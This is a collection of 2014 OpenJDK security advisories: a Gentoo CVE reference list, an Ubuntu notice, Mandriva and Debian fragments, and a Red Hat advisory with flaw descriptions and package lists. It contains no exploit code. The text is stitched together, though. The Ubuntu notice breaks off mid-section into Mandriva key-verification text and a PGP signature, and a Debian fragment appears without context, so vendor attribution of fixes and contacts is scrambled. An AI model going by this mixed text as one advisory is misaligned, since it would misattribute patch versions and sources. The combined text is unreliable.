http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1569
[ 133 ] CVE-2013-1571
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1571
[ 134 ] CVE-2013-2383
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2383
[ 135 ] CVE-2013-2384
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2384
[ 136 ] CVE-2013-2407
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2407
[ 137 ] CVE-2013-2412
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2412
[ 138 ] CVE-2013-2415
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2415
[ 139 ] CVE-2013-2417
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2417
[ 140 ] CVE-2013-2419
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2419
[ 141 ] CVE-2013-2420
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2420
[ 142 ] CVE-2013-2421
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2421
[ 143 ] CVE-2013-2422
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2422
[ 144 ] CVE-2013-2423
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2423
[ 145 ] CVE-2013-2424
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2424
[ 146 ] CVE-2013-2426
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2426
[ 147 ] CVE-2013-2429
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2429
[ 148 ] CVE-2013-2430
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2430
[ 149 ] CVE-2013-2431
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2431
[ 150 ] CVE-2013-2436
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2436
[ 151 ] CVE-2013-2443
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2443
[ 152 ] CVE-2013-2444
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2444
[ 153 ] CVE-2013-2445
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2445
[ 154 ] CVE-2013-2446
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2446
[ 155 ] CVE-2013-2447
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2447
[ 156 ] CVE-2013-2448
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2448
[ 157 ] CVE-2013-2449
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2449
[ 158 ] CVE-2013-2450
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2450
[ 159 ] CVE-2013-2451
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2451
[ 160 ] CVE-2013-2452
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2452
[ 161 ] CVE-2013-2453
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2453
[ 162 ] CVE-2013-2454
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2454
[ 163 ] CVE-2013-2455
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2455
[ 164 ] CVE-2013-2456
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2456
[ 165 ] CVE-2013-2457
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2457
[ 166 ] CVE-2013-2458
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2458
[ 167 ] CVE-2013-2459
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2459
[ 168 ] CVE-2013-2460
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2460
[ 169 ] CVE-2013-2461
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2461
[ 170 ] CVE-2013-2463
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2463
[ 171 ] CVE-2013-2465
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2465
[ 172 ] CVE-2013-2469
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2469
[ 173 ] CVE-2013-2470
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2470
[ 174 ] CVE-2013-2471
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2471
[ 175 ] CVE-2013-2472
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2472
[ 176 ] CVE-2013-2473
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2473
[ 177 ] CVE-2013-3829
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3829
[ 178 ] CVE-2013-4002
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4002
[ 179 ] CVE-2013-5772
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5772
[ 180 ] CVE-2013-5774
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5774
[ 181 ] CVE-2013-5778
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5778
[ 182 ] CVE-2013-5780
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5780
[ 183 ] CVE-2013-5782
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5782
[ 184 ] CVE-2013-5783
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5783
[ 185 ] CVE-2013-5784
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5784
[ 186 ] CVE-2013-5790
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5790
[ 187 ] CVE-2013-5797
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5797
[ 188 ] CVE-2013-5800
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5800
[ 189 ] CVE-2013-5802
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5802
[ 190 ] CVE-2013-5803
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5803
[ 191 ] CVE-2013-5804
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5804
[ 192 ] CVE-2013-5805
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5805
[ 193 ] CVE-2013-5806
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5806
[ 194 ] CVE-2013-5809
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5809
[ 195 ] CVE-2013-5814
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5814
[ 196 ] CVE-2013-5817
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5817
[ 197 ] CVE-2013-5820
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5820
[ 198 ] CVE-2013-5823
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5823
[ 199 ] CVE-2013-5825
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5825
[ 200 ] CVE-2013-5829
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5829
[ 201 ] CVE-2013-5830
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5830
[ 202 ] CVE-2013-5840
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5840
[ 203 ] CVE-2013-5842
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5842
[ 204 ] CVE-2013-5849
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5849
[ 205 ] CVE-2013-5850
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5850
[ 206 ] CVE-2013-5851
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5851
[ 207 ] CVE-2013-6629
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-6629
[ 208 ] CVE-2013-6954
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-6954
[ 209 ] CVE-2014-0429
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0429
[ 210 ] CVE-2014-0446
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0446
[ 211 ] CVE-2014-0451
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0451
[ 212 ] CVE-2014-0452
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0452
[ 213 ] CVE-2014-0453
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0453
[ 214 ] CVE-2014-0456
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0456
[ 215 ] CVE-2014-0457
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0457
[ 216 ] CVE-2014-0458
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0458
[ 217 ] CVE-2014-0459
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0459
[ 218 ] CVE-2014-0460
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0460
[ 219 ] CVE-2014-0461
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0461
[ 220 ] CVE-2014-1876
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1876
[ 221 ] CVE-2014-2397
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2397
[ 222 ] CVE-2014-2398
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2398
[ 223 ] CVE-2014-2403
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2403
[ 224 ] CVE-2014-2412
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2412
[ 225 ] CVE-2014-2414
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2414
[ 226 ] CVE-2014-2421
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2421
[ 227 ] CVE-2014-2423
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2423
[ 228 ] CVE-2014-2427
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2427
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201406-32.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2014 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. ============================================================================
Ubuntu Security Notice USN-2191-1
May 01, 2014
openjdk-6 vulnerabilities
============================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 12.04 LTS
- Ubuntu 10.04 LTS
Summary:
Several security issues were fixed in OpenJDK 6.
Software Description:
- openjdk-6: Open Source Java implementation
Details:
Several vulnerabilities were discovered in the OpenJDK JRE related to
information disclosure, data integrity and availability. An attacker could
exploit these to cause a denial of service or expose sensitive data over
the network. (CVE-2014-0429, CVE-2014-0446, CVE-2014-0451, CVE-2014-0452,
CVE-2014-0456, CVE-2014-0457, CVE-2014-0458, CVE-2014-0461, CVE-2014-0462,
CVE-2014-2397, CVE-2014-2405, CVE-2014-2412, CVE-2014-2414, CVE-2014-2421,
CVE-2014-2423, CVE-2014-2427)
Two vulnerabilities were discovered in the OpenJDK JRE related to
information disclosure and data integrity. An attacker could exploit these
to expose sensitive data over the network. (CVE-2014-0453, CVE-2014-0460)
A vulnerability was discovered in the OpenJDK JRE related to availability.
An attacker could exploit this to cause a denial of service.
(CVE-2014-0459)
Jakub Wilk discovered that the OpenJDK JRE incorrectly handled temporary
files. In the default installation of Ubuntu, this should be
prevented by the Yama link restrictions. (CVE-2014-1876)
A vulnerability was discovered in the OpenJDK JRE related to data
integrity. (CVE-2014-2398)
A vulnerability was discovered in the OpenJDK JRE related to information
disclosure. An attacker could exploit this to expose sensitive data over
the network. (CVE-2014-2403)
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 12.04 LTS:
icedtea-6-jre-cacao 6b31-1.13.3-1ubuntu1~0.12.04.2
icedtea-6-jre-jamvm 6b31-1.13.3-1ubuntu1~0.12.04.2
openjdk-6-jre 6b31-1.13.3-1ubuntu1~0.12.04.2
openjdk-6-jre-headless 6b31-1.13.3-1ubuntu1~0.12.04.2
openjdk-6-jre-lib 6b31-1.13.3-1ubuntu1~0.12.04.2
openjdk-6-jre-zero 6b31-1.13.3-1ubuntu1~0.12.04.2
Ubuntu 10.04 LTS:
icedtea-6-jre-cacao 6b31-1.13.3-1ubuntu1~0.10.04.1
openjdk-6-jre 6b31-1.13.3-1ubuntu1~0.10.04.1
openjdk-6-jre-headless 6b31-1.13.3-1ubuntu1~0.10.04.1
openjdk-6-jre-lib 6b31-1.13.3-1ubuntu1~0.10.04.1
openjdk-6-jre-zero 6b31-1.13.3-1ubuntu1~0.10.04.1
This update uses a new upstream release, which includes additional bug
fixes. Further
information about these flaws can be found on the Oracle Java SE Critical
Patch Update Advisory pages, listed in the References section.
Note that the CVE-2014-0459 issue is in the lcms2 library, which has
been patched to correct this flaw. The verification
of md5 checksums and GPG signatures is performed automatically for you. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/en/support/security/advisories/
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)
iD8DBQFTdfckmqjQ0CJFipgRArKEAKCIiAR2WkLo3Vb0gzzQ5RDz7hQZ3gCcDC6A
5xOtKkhOvonpLXoqBiAcXWQ=
=qBk5
-----END PGP SIGNATURE-----
. 7) - x86_64
3.
For the stable distribution (wheezy), these problems have been fixed in
version 7u55-2.4.7-1~deb7u1.
For the unstable distribution (sid), these problems have been fixed in
version 7u55-2.4.7-1. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Important: java-1.6.0-openjdk security and bug fix update
Advisory ID: RHSA-2014:0408-01
Product: Red Hat Enterprise Linux
Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-0408.html
Issue date: 2014-04-16
CVE Names: CVE-2014-0429 CVE-2014-0446 CVE-2014-0451
CVE-2014-0452 CVE-2014-0453 CVE-2014-0456
CVE-2014-0457 CVE-2014-0458 CVE-2014-0460
CVE-2014-0461 CVE-2014-1876 CVE-2014-2397
CVE-2014-2398 CVE-2014-2403 CVE-2014-2412
CVE-2014-2414 CVE-2014-2421 CVE-2014-2423
CVE-2014-2427
=====================================================================
1. Summary:
Updated java-1.6.0-openjdk packages that fix various security issues and
one bug are now available for Red Hat Enterprise Linux 5 and 6.
The Red Hat Security Response Team has rated this update as having
Important security impact. Common Vulnerability Scoring System (CVSS) base
scores, which give detailed severity ratings, are available for each
vulnerability from the CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux (v. 5 server) - i386, x86_64
Red Hat Enterprise Linux Desktop (v. 5 client) - i386, x86_64
Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64
Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64
Red Hat Enterprise Linux HPC Node (v. 6) - x86_64
Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64
Red Hat Enterprise Linux Server (v. 6) - i386, x86_64
Red Hat Enterprise Linux Server Optional (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64
3. Description:
The java-1.6.0-openjdk packages provide the OpenJDK 6 Java Runtime
Environment and the OpenJDK 6 Java Software Development Kit.
An input validation flaw was discovered in the medialib library in the 2D
component. A specially crafted image could trigger Java Virtual Machine
memory corruption when processed. A remote attacker, or an untrusted Java
application or applet, could possibly use this flaw to execute arbitrary
code with the privileges of the user running the Java Virtual Machine.
(CVE-2014-0429)
Multiple flaws were discovered in the Hotspot and 2D components in OpenJDK.
An untrusted Java application or applet could use these flaws to trigger
Java Virtual Machine memory corruption and possibly bypass Java sandbox
restrictions. (CVE-2014-0456, CVE-2014-2397, CVE-2014-2421)
Multiple improper permission check issues were discovered in the Libraries
component in OpenJDK. An untrusted Java application or applet could use
these flaws to bypass Java sandbox restrictions. (CVE-2014-0457,
CVE-2014-0461)
Multiple improper permission check issues were discovered in the AWT,
JAX-WS, JAXB, Libraries, and Sound components in OpenJDK. An untrusted Java
application or applet could use these flaws to bypass certain Java sandbox
restrictions. (CVE-2014-2412, CVE-2014-0451, CVE-2014-0458, CVE-2014-2423,
CVE-2014-0452, CVE-2014-2414, CVE-2014-0446, CVE-2014-2427)
Multiple flaws were identified in the Java Naming and Directory Interface
(JNDI) DNS client. These flaws could make it easier for a remote attacker
to perform DNS spoofing attacks. (CVE-2014-0460)
It was discovered that the JAXP component did not properly prevent access
to arbitrary files when a SecurityManager was present. This flaw could
cause a Java application using JAXP to leak sensitive information, or
affect application availability. (CVE-2014-2403)
It was discovered that the Security component in OpenJDK could leak some
timing information when performing PKCS#1 unpadding. This could possibly
lead to the disclosure of some information that was meant to be protected
by encryption. (CVE-2014-0453)
It was discovered that the fix for CVE-2013-5797 did not properly resolve
input sanitization flaws in javadoc. When javadoc documentation was
generated from an untrusted Java source code and hosted on a domain not
controlled by the code author, these issues could make it easier to perform
cross-site scripting (XSS) attacks. (CVE-2014-2398)
An insecure temporary file use flaw was found in the way the unpack200
utility created log files. A local attacker could possibly use this flaw to
perform a symbolic link attack and overwrite arbitrary files with the
privileges of the user running unpack200. (CVE-2014-1876)
This update also fixes the following bug:
* The OpenJDK update to IcedTea version 1.13 introduced a regression
related to the handling of the jdk_version_info variable. This variable was
not properly zeroed out before being passed to the Java Virtual Machine,
resulting in a memory leak in the java.lang.ref.Finalizer class.
This update fixes this issue, and memory leaks no longer occur.
(BZ#1085373)
All users of java-1.6.0-openjdk are advised to upgrade to these updated
packages, which resolve these issues. All running instances of OpenJDK Java
must be restarted for the update to take effect.
4. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to use the
Red Hat Network to apply this update are available at
https://access.redhat.com/site/articles/11258
5. Bugs fixed (https://bugzilla.redhat.com/):
1060907 - CVE-2014-1876 OpenJDK: insecure temporary file use in unpack200 (Libraries, 8033618)
1085373 - java.lang.ref.Finalizer leak when upgrading from 1.62 to 1.66
1086632 - CVE-2014-2398 OpenJDK: insufficient escaping of window title string (Javadoc, 8026736)
1086645 - CVE-2014-0453 OpenJDK: RSA unpadding timing issues (Security, 8027766)
1087409 - CVE-2014-0429 OpenJDK: Incorrect mlib/raster image validation (2D, 8027841)
1087411 - CVE-2014-0457 OpenJDK: ServiceLoader Exception handling security bypass (Libraries, 8031394)
1087413 - CVE-2014-0456 OpenJDK: System.arraycopy() element race condition (Hotspot, 8029858)
1087417 - CVE-2014-2421 OpenJDK: JPEG decoder input stream handling (2D, 8029854)
1087423 - CVE-2014-2397 OpenJDK: classfile parser invalid BootstrapMethods attribute length (Hotspot, 8034926)
1087426 - CVE-2014-0461 OpenJDK: Better ScriptEngineManager ScriptEngine management (Libraries, 8036794)
1087427 - CVE-2014-2412 OpenJDK: AWT thread context handling (AWT, 8025010)
1087428 - CVE-2014-0451 OpenJDK: AWT incorrect FlavorMap seperation (AWT, 8026797)
1087430 - CVE-2014-0458 OpenJDK: Activation framework default command map caching (JAX-WS, 8025152)
1087431 - CVE-2014-2414 OpenJDK: incorrect caching of data initialized via TCCL (JAXB, 8025030)
1087434 - CVE-2014-2423 OpenJDK: incorrect caching of data initialized via TCCL (JAXWS, 8026188)
1087436 - CVE-2014-0452 OpenJDK: incorrect caching of data initialized via TCCL (JAXWS, 8026801)
1087439 - CVE-2014-0446 OpenJDK: Protect logger handlers (Libraries, 8029740)
1087441 - CVE-2014-2427 OpenJDK: remove insecure Java Sound provider caching (Sound, 8026163)
1087442 - CVE-2014-0460 OpenJDK: missing randomization of JNDI DNS client query IDs (JNDI, 8030731)
1087443 - CVE-2014-2403 OpenJDK: JAXP CharInfo file access restriction (JAXP, 8029282)
6. Package List:
Red Hat Enterprise Linux Desktop (v. 5 client):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Client/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el5_10.src.rpm
i386:
java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el5_10.i386.rpm
java-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el5_10.i386.rpm
java-1.6.0-openjdk-demo-1.6.0.0-5.1.13.3.el5_10.i386.rpm
java-1.6.0-openjdk-devel-1.6.0.0-5.1.13.3.el5_10.i386.rpm
java-1.6.0-openjdk-javadoc-1.6.0.0-5.1.13.3.el5_10.i386.rpm
java-1.6.0-openjdk-src-1.6.0.0-5.1.13.3.el5_10.i386.rpm
x86_64:
java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el5_10.x86_64.rpm
java-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el5_10.x86_64.rpm
java-1.6.0-openjdk-demo-1.6.0.0-5.1.13.3.el5_10.x86_64.rpm
java-1.6.0-openjdk-devel-1.6.0.0-5.1.13.3.el5_10.x86_64.rpm
java-1.6.0-openjdk-javadoc-1.6.0.0-5.1.13.3.el5_10.x86_64.rpm
java-1.6.0-openjdk-src-1.6.0.0-5.1.13.3.el5_10.x86_64.rpm
Red Hat Enterprise Linux (v. 5 server):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Server/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el5_10.src.rpm
i386:
java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el5_10.i386.rpm
java-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el5_10.i386.rpm
java-1.6.0-openjdk-demo-1.6.0.0-5.1.13.3.el5_10.i386.rpm
java-1.6.0-openjdk-devel-1.6.0.0-5.1.13.3.el5_10.i386.rpm
java-1.6.0-openjdk-javadoc-1.6.0.0-5.1.13.3.el5_10.i386.rpm
java-1.6.0-openjdk-src-1.6.0.0-5.1.13.3.el5_10.i386.rpm
x86_64:
java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el5_10.x86_64.rpm
java-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el5_10.x86_64.rpm
java-1.6.0-openjdk-demo-1.6.0.0-5.1.13.3.el5_10.x86_64.rpm
java-1.6.0-openjdk-devel-1.6.0.0-5.1.13.3.el5_10.x86_64.rpm
java-1.6.0-openjdk-javadoc-1.6.0.0-5.1.13.3.el5_10.x86_64.rpm
java-1.6.0-openjdk-src-1.6.0.0-5.1.13.3.el5_10.x86_64.rpm
Red Hat Enterprise Linux Desktop (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.src.rpm
i386:
java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.i686.rpm
java-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el6_5.i686.rpm
x86_64:
java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm
java-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.src.rpm
i386:
java-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el6_5.i686.rpm
java-1.6.0-openjdk-demo-1.6.0.0-5.1.13.3.el6_5.i686.rpm
java-1.6.0-openjdk-devel-1.6.0.0-5.1.13.3.el6_5.i686.rpm
java-1.6.0-openjdk-javadoc-1.6.0.0-5.1.13.3.el6_5.i686.rpm
java-1.6.0-openjdk-src-1.6.0.0-5.1.13.3.el6_5.i686.rpm
x86_64:
java-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm
java-1.6.0-openjdk-demo-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm
java-1.6.0-openjdk-devel-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm
java-1.6.0-openjdk-javadoc-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm
java-1.6.0-openjdk-src-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.src.rpm
x86_64:
java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm
java-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.src.rpm
x86_64:
java-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm
java-1.6.0-openjdk-demo-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm
java-1.6.0-openjdk-devel-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm
java-1.6.0-openjdk-javadoc-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm
java-1.6.0-openjdk-src-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.src.rpm
i386:
java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.i686.rpm
java-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el6_5.i686.rpm
java-1.6.0-openjdk-devel-1.6.0.0-5.1.13.3.el6_5.i686.rpm
java-1.6.0-openjdk-javadoc-1.6.0.0-5.1.13.3.el6_5.i686.rpm
x86_64:
java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm
java-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm
java-1.6.0-openjdk-devel-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm
java-1.6.0-openjdk-javadoc-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.src.rpm
i386:
java-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el6_5.i686.rpm
java-1.6.0-openjdk-demo-1.6.0.0-5.1.13.3.el6_5.i686.rpm
java-1.6.0-openjdk-src-1.6.0.0-5.1.13.3.el6_5.i686.rpm
x86_64:
java-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm
java-1.6.0-openjdk-demo-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm
java-1.6.0-openjdk-src-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.src.rpm
i386:
java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.i686.rpm
java-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el6_5.i686.rpm
java-1.6.0-openjdk-devel-1.6.0.0-5.1.13.3.el6_5.i686.rpm
java-1.6.0-openjdk-javadoc-1.6.0.0-5.1.13.3.el6_5.i686.rpm
x86_64:
java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm
java-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm
java-1.6.0-openjdk-devel-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm
java-1.6.0-openjdk-javadoc-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-5.1.13.3.el6_5.src.rpm
i386:
java-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el6_5.i686.rpm
java-1.6.0-openjdk-demo-1.6.0.0-5.1.13.3.el6_5.i686.rpm
java-1.6.0-openjdk-src-1.6.0.0-5.1.13.3.el6_5.i686.rpm
x86_64:
java-1.6.0-openjdk-debuginfo-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm
java-1.6.0-openjdk-demo-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm
java-1.6.0-openjdk-src-1.6.0.0-5.1.13.3.el6_5.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2014-0429.html
https://www.redhat.com/security/data/cve/CVE-2014-0446.html
https://www.redhat.com/security/data/cve/CVE-2014-0451.html
https://www.redhat.com/security/data/cve/CVE-2014-0452.html
https://www.redhat.com/security/data/cve/CVE-2014-0453.html
https://www.redhat.com/security/data/cve/CVE-2014-0456.html
https://www.redhat.com/security/data/cve/CVE-2014-0457.html
